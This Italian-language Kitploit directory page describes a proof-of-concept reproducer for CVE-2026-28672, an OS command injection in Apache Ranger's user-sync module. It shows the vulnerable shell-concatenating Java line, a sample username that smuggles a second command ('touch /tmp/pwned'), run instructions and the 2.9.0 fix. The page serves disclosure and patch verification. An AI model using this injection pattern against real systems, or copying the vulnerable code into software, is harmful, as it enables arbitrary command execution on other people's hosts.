Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-28672 — Replicatore proof-of-concept per l'iniezione di comandi OS in Apache Ranger UnixUserGroupBuilder (CVE-2026-28672), che dimostra la vulnerabilità e verifica la correzione. | Kitploit
Strumenti/GitHubGitHub/oscerd/cve-2026-28672
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPaper e RicercaApprendimento e Formazione
GitHuboscerd/cve-2026-28672

CVE-2026-28672

Replicatore proof-of-concept per l'iniezione di comandi OS in Apache Ranger UnixUserGroupBuilder (CVE-2026-28672), che dimostra la vulnerabilità e verifica la correzione.

Vedi Repository
8h 36m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-28672 — Iniezione di comandi OS in UnixUserGroupBuilder di Apache Ranger

Reproducer proof-of-concept eseguibile per l'iniezione di comandi OS nel modulo user-sync (unixusersync) di Apache Ranger.

Durante l'enumerazione dei gruppi di ogni utente sincronizzato, UnixUserGroupBuilder esegue il comando id tramite una shell, concatenando il nome utente nella riga di comando:

root@kitploit:~
// ugsync/src/main/java/org/apache/ranger/unixusersync/process/UnixUserGroupBuilder.java  (Ranger <= 2.8.0)
Process process = Runtime.getRuntime().exec(new String[]{"bash", "-c", "id -G " + userName});

Il nome utente proviene dalla sorgente user-sync configurata (LDAP/AD o un file), quindi è influenzabile da un attaccante. Un nome utente contenente metacaratteri di shell — ad es. alice; touch /tmp/pwned — viene eseguito come comando OS (CWE-77, neutralizzazione impropria di elementi speciali usati in un comando).

Esecuzione

root@kitploit:~
mvn -q -DskipTests package
docker compose up --build
# oppure, senza Docker (richiede bash/id/touch nel PATH):
java -jar target/cve-2026-28672.jar
Scarica lo strumento

Output atteso sul percorso di codice vulnerabile:

root@kitploit:~
[1] Nome utente benigno 'nobody':
      id -G nobody -> 65534
[2] Nome utente malizioso 'nobody; touch /tmp/pwned-28672' (vulnerabile <= 2.8.0):
      comando iniettato eseguito? marker /tmp/pwned-28672 esiste = true
[3] Stesso nome utente malizioso tramite la CORREZIONE 2.9.0 (id eseguito direttamente, senza shell):
      id -G 'nobody; touch /tmp/pwned-28672' -> null
      comando iniettato eseguito? marker esiste = false
>>> DIMOSTRATO: ... iniezione di comandi OS (CWE-77): true

Riepilogo della vulnerabilità

ProprietàValore
ProgettoApache Ranger — org.apache.ranger.unixusersync (user-sync)
ClasseCWE-77 Neutralizzazione impropria di elementi speciali usati in un comando ('Command Injection')
Vettore di attaccoUn nome utente contenente metacaratteri di shell fornito dalla sorgente user-sync
ImpattoEsecuzione arbitraria di comandi OS sull'host user-sync di Ranger
Versioni interessatedalla 0.6 alla 2.8
Versione corretta2.9.0
Avvisothread su lists.apache.org · CVE-2026-28672
CreditiAndrea Cosentino

La correzione

Apache Ranger 2.9.0 esegue id direttamente come vettore di argomenti, quindi il nome utente è un singolo argomento letterale e non viene mai interpretato da una shell:

root@kitploit:~
// Ranger 2.9.0
Process process = Runtime.getRuntime().exec(new String[] {"id", "-G", userName});

UnixUserGroupBuilderVuln.java in questo repository contiene entrambe le forme testualmente, citate dalla sorgente upstream.

Disclaimer

Questo repository è pubblicato a scopo educativo e difensivo: per aiutare gli utenti di Apache Ranger a comprendere la vulnerabilità, verificare se sono interessati e confermare che l'aggiornamento la risolve. Il payload è benigno (crea un file marker in /tmp). Non utilizzare questo materiale contro sistemi di cui non sei proprietario o operatore.